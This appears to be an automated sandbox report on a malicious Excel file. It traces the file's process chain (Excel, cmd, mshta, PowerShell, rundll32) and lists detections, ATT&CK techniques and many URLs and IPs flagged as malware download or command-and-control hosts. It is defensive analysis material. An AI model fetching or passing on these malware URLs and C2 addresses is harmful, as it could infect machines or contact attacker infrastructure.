                            Encrypted Channel                            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts13
                            Exploitation for Client Execution                            		Logon Script (Windows)Logon Script (Windows)21
                            Scripting                            		Security Account Manager38
                            System Information Discovery                            		SMB/Windows Admin Shares1
                            Input Capture                            		Automated Exfiltration1
                            Non-Standard Port                            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts11
                            Command and Scripting Interpreter                            		Logon Script (Mac)Logon Script (Mac)2
                            Obfuscated Files or Information                            		NTDS21
                            Security Software Discovery                            		Distributed Component Object Model1
                            Clipboard Data                            		Scheduled Transfer2
                            Non-Application Layer Protocol                            		SIM Card SwapCarrier Billing Fraud
                            Cloud Accounts1
                            Service Execution                            		Network Logon ScriptNetwork Logon Script2
                            Masquerading                            		LSA Secrets1
                            Virtualization/Sandbox Evasion                            		SSHKeyloggingData Transfer Size Limits122
                            Application Layer Protocol                            		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable Media1
                            PowerShell                            		Rc.commonRc.common1
                            Virtualization/Sandbox Evasion                            		Cached Domain Credentials2
                            Process Discovery                            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                            Process Injection                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                            Hidden Files and Directories                            		Proc Filesystem1
                            Remote System Discovery                            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Rundll32                            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562416 Sample: DOCUMENT_2801.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 52 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->52 54 118.98.72.86 TELKOMNET-AS-APPTTelekomunikasiIndonesiaID Indonesia 2->54 56 29 other IPs or domains 2->56 64 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->64 66 Multi AV Scanner detection for domain / URL 2->66 68 Found malware configuration 2->68 70 17 other signatures 2->70 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 50 C:\Users\user\Desktop\DOCUMENT_2801.xls, Composite 15->50 dropped 62 Passes commands via pipe to a shell (likely to bypass AV or HIPS) 15->62 19 cmd.exe 15->19         started        signatures6 process7 process8 21 cmd.exe 19->21         started        23 cmd.exe 19->23         started        process9 25 mshta.exe 11 21->25         started        dnsIp10 58 91.240.118.172, 49165, 49166, 80 GLOBALLAYERNL unknown 25->58 28 powershell.exe 12 7 25->28         started        process11 dnsIp12 60 tamiladsense.com 136.0.111.15, 49167, 80 AS40676US United States 28->60 48 C:\ProgramData\Milossd.dll, PE32 28->48 dropped 76 Powershell drops PE file 28->76 33 cmd.exe 28->33         started        file13 signatures14 process15 process16 35 rundll32.exe 33->35         started        process17 37 rundll32.exe 1 35->37         started        file18 46 C:\Windows\...\kisyfwhhvxv.tpx (copy), PE32 37->46 dropped 72 Hides that the sample has been downloaded from the Internet (zone.identifier) 37->72 41 rundll32.exe 37->41         started        signatures19 process20 process21 43 rundll32.exe 1 41->43         started        signatures22 74 Hides that the sample has been downloaded from the Internet (zone.identifier) 43->74

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            DOCUMENT_2801.xls17%ReversingLabsDocument-Excel.Trojan.Heuristic

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\ProgramData\Milossd.dll100%Joe Sandbox ML

                            Unpacked PE Files

                            SourceDetectionScannerLabelLinkDownload
                            17.2.rundll32.exe.3090000.27.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            14.2.rundll32.exe.d80000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2760000.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.3c0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2a90000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.25b0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2880000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            14.2.rundll32.exe.2e10000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.370000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.29a0000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.e50000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            16.2.rundll32.exe.200000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2730000.7.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.270000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2f70000.23.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.7d0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2eb0000.21.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.27d0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2db0000.19.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.e80000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            14.2.rundll32.exe.2900000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.340000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.8b0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            11.2.rundll32.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.c20000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.730000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2900000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.600000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.270000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.860000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2fc0000.24.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2800000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.2b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.880000.3.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2e40000.20.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2800000.10.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.27d0000.9.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.28d0000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2b00000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2e90000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2e40000.14.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2d80000.18.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.830000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2d10000.16.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.3030000.25.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.3060000.26.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.810000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2830000.11.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2cf0000.12.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2a10000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2d50000.17.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.27a0000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2b30000.14.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.2b60000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            14.2.rundll32.exe.2400000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.26d0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.2ee0000.22.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.26a0000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.700000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.ce0000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.8e0000.5.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2db0000.13.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.290000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                            Domains

                            SourceDetectionScannerLabelLink
                            tamiladsense.com8%VirustotalBrowse

                            URLs

                            SourceDetectionScannerLabelLink
                            http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/PE3100%Avira URL Cloudmalware
                            https://vn.minin0%Avira URL Cloudsafe
                            http://engaz.shop/wp-content/MOllqUm2nb/PE3100%Avira URL Cloudmalware
                            http://ocsp.entrust.net030%URL Reputationsafe
                            https://lastregaristorante.com/w0%Avira URL Cloudsafe
                            http://91.240.118.172/ee/ss/se.htmlngs0%Avira URL Cloudsafe
                            http://engaz.shop/wp-content/MOllqUm2nb/100%Avira URL Cloudmalware
                            http://91.240.118.17f0%Avira URL Cloudsafe
                            https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/PE3100%Avira URL Cloudmalware
                            https://oculusvisioncare.com/wp-0%Avira URL Cloudsafe
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                            http://tunbridgeservices.com/jfo0%Avira URL Cloudsafe
                            http://91.240.118.172/ee/ss/se.html100%Avira URL Cloudmalware
                            http://3-fasen.com/wp-content/3Bl0hBbW/PE3100%Avira URL Cloudmalware
                            http://91.240.110%URL Reputationsafe
                            https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/100%Avira URL Cloudmalware
                            http://manchesterheatingservices.youprocontact.com/wp-admin/AiK1100%Avira URL Cloudmalware
                            https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/100%Avira URL Cloudmalware
                            http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/PE3100%Avira URL Cloudmalware
                            https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/PE3100%Avira URL Cloudmalware
                            http://tunbridgeservices.com/jfoeqhxz/zOX0/PE3100%Avira URL Cloudmalware
                            https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/PE3100%Avira URL Cloudmalware
                            https://139.196.72.155/R0%Avira URL Cloudsafe
                            http://91.240.118.172/ee/ss/se.p0%Avira URL Cloudsafe
                            http://tamiladsense.com/wp-inclu100%Avira URL Cloudmalware
                            http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/100%Avira URL Cloudmalware
                            http://imaginariumstore.fun/ncsb100%Avira URL Cloudmalware
                            http://91.240.118.172/ee/ss/se.pngPE30%Avira URL Cloudsafe
                            https://mypurealsystem.com/App_Start/Rhh8lKO/PE3100%Avira URL Cloudmalware
                            https://ecobaby.pi-dh.com/Serend100%Avira URL Cloudmalware
                            http://3-fasen.com/wp-content/3B100%Avira URL Cloudmalware
                            http://onexone.elementor.cloud/c100%Avira URL Cloudmalware
                            https://mypurealsystem.com/App_S0%Avira URL Cloudsafe
                            https://74.207.230.120:8080/FdEJzcDerSgtVabAaMUkOcPkEPidYPfBmMvmzXVDJBNdJaXMcsv%lwG0%Avira URL Cloudsafe
                            http://ocsp.entrust.net0D0%URL Reputationsafe
                            http://servername/isapibackend.dll0%Avira URL Cloudsafe
                            http://3-fasen.com/wp-content/3Bl0hBbW/100%Avira URL Cloudmalware
                            http://3-fasen.c0%Avira URL Cloudsafe
                            http://engaz.shop/wp-content/MOl100%Avira URL Cloudmalware
                            https://139.196.72.155:8080/LAeYVpeCtdnRcZsIKojYxnmOXJiyfTZboPIEXmAZEezOwG0%Avira URL Cloudsafe
                            http://devbhoomigaushala.org/Get0%Avira URL Cloudsafe
                            https://mypurealsystem.com/App_Start/Rhh8lKO/100%Avira URL Cloudmalware
                            https://74.207.230.120:8080/FdEJzcDerSgtVabAaMUkOcPkEPidYPfBmMvmzXVDJBNdJaXM0%Avira URL Cloudsafe
                            https://74.207.230.120/O0%Avira URL Cloudsafe
                            https://vn.minino.com/wp-admin/c3WQa/PE3100%Avira URL Cloudmalware
                            http://91.240.118.172/ee/ss/se.htmlhttp://91.240.118.172/ee/ss/se.html0%Avira URL Cloudsafe
                            https://vn.minino.com/wp-admin/c3WQa/100%Avira URL Cloudmalware
                            http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/100%Avira URL Cloudmalware
                            https://139.196.72.155:8080/LAeYVpeCtdnRcZsIKojYxnmOXJiyfTZboPIEXmAZEe0%Avira URL Cloudsafe
                            https://139.196.72.155/0%Avira URL Cloudsafe
                            http://91.240.118.1720%Avira URL Cloudsafe
                            http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/PE3100%Avira URL Cloudmalware
                            http://www.protware.com0%URL Reputationsafe
                            http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/100%Avira URL Cloudmalware
                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                            http://91.240.118.172/ee/ss/se.htmli0%Avira URL Cloudsafe
                            http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/100%Avira URL Cloudmalware
                            http://tamiladsense.com100%Avira URL Cloudmalware
                            http://onexone.e0%Avira URL Cloudsafe
                            https://vn.minino.com/wp-admin/c0%Avira URL Cloudsafe
                            http://tunbridgeservices.com/jfoeqhxz/zOX0/100%Avira URL Cloudmalware
                            http://91.240.118.172/ee/ss/se.htmlfunction0%Avira URL Cloudsafe
                            http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/100%Avira URL Cloudmalware
                            http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/PE3100%Avira URL Cloudmalware
                            http://91.240.118.172/ee/ss/se.png100%Avira URL Cloudmalware
                            http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/PE3100%Avira URL Cloudmalware
                            https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/100%Avira URL Cloudmalware
                            http://91.240.11x0%Avira URL Cloudsafe
                            http://engaz.sho0%Avira URL Cloudsafe
                            https://74.207.230.120/d0%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            tamiladsense.com
                            		136.0.111.15
                            		truetrueunknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://91.240.118.172/ee/ss/se.htmltrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172/ee/ss/se.pngtrue
                            • Avira URL Cloud: malware
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://vn.mininpowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://engaz.shop/wp-content/MOllqUm2nb/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://ocsp.entrust.net03rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://lastregaristorante.com/wpowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.240.118.172/ee/ss/se.htmlngsmshta.exe, 00000006.00000002.429411187.000000000048E000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://engaz.shop/wp-content/MOllqUm2nb/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.17fmshta.exe, 00000006.00000003.412876273.000000000053F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.430034442.000000000053F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.428162711.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		low
                            https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://oculusvisioncare.com/wp-powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.diginotar.nl/cps/pkioverheid0rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://tunbridgeservices.com/jfopowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://3-fasen.com/wp-content/3Bl0hBbW/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.11powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: safe
                            		low
                            https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://manchesterheatingservices.youprocontact.com/wp-admin/AiK1powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://tunbridgeservices.com/jfoeqhxz/zOX0/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://139.196.72.155/Rrundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.240.118.172/ee/ss/se.ppowershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://tamiladsense.com/wp-inclupowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://imaginariumstore.fun/ncsbpowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172/ee/ss/se.pngPE3powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://mypurealsystem.com/App_Start/Rhh8lKO/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://ecobaby.pi-dh.com/Serendpowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://3-fasen.com/wp-content/3Bpowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://onexone.elementor.cloud/cpowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://mypurealsystem.com/App_Spowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://74.207.230.120:8080/FdEJzcDerSgtVabAaMUkOcPkEPidYPfBmMvmzXVDJBNdJaXMcsv%lwGrundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ocsp.entrust.net0Drundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://servername/isapibackend.dllrundll32.exe, 00000011.00000002.665515752.00000000038C0000.00000002.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		low
                            http://3-fasen.com/wp-content/3Bl0hBbW/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://3-fasen.cpowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://engaz.shop/wp-content/MOlpowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://139.196.72.155:8080/LAeYVpeCtdnRcZsIKojYxnmOXJiyfTZboPIEXmAZEezOwGrundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://devbhoomigaushala.org/Getpowershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://mypurealsystem.com/App_Start/Rhh8lKO/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://74.207.230.120:8080/FdEJzcDerSgtVabAaMUkOcPkEPidYPfBmMvmzXVDJBNdJaXMrundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.entrust.net/server1.crl0rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://74.207.230.120/Orundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://vn.minino.com/wp-admin/c3WQa/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.172/ee/ss/se.htmlhttp://91.240.118.172/ee/ss/se.htmlmshta.exe, 00000006.00000003.414502711.0000000003145000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://vn.minino.com/wp-admin/c3WQa/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://139.196.72.155:8080/LAeYVpeCtdnRcZsIKojYxnmOXJiyfTZboPIEXmAZEerundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://139.196.72.155/rundll32.exe, 00000011.00000002.663342975.000000000047A000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://91.240.118.172powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/PE3powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.protware.commshta.exe, 00000006.00000003.428385382.000000000405D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.428149840.0000000000530000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://91.240.118.172/ee/ss/se.htmlimshta.exe, 00000006.00000003.428424323.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.427844761.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.412617394.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.433058972.00000000040DC000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
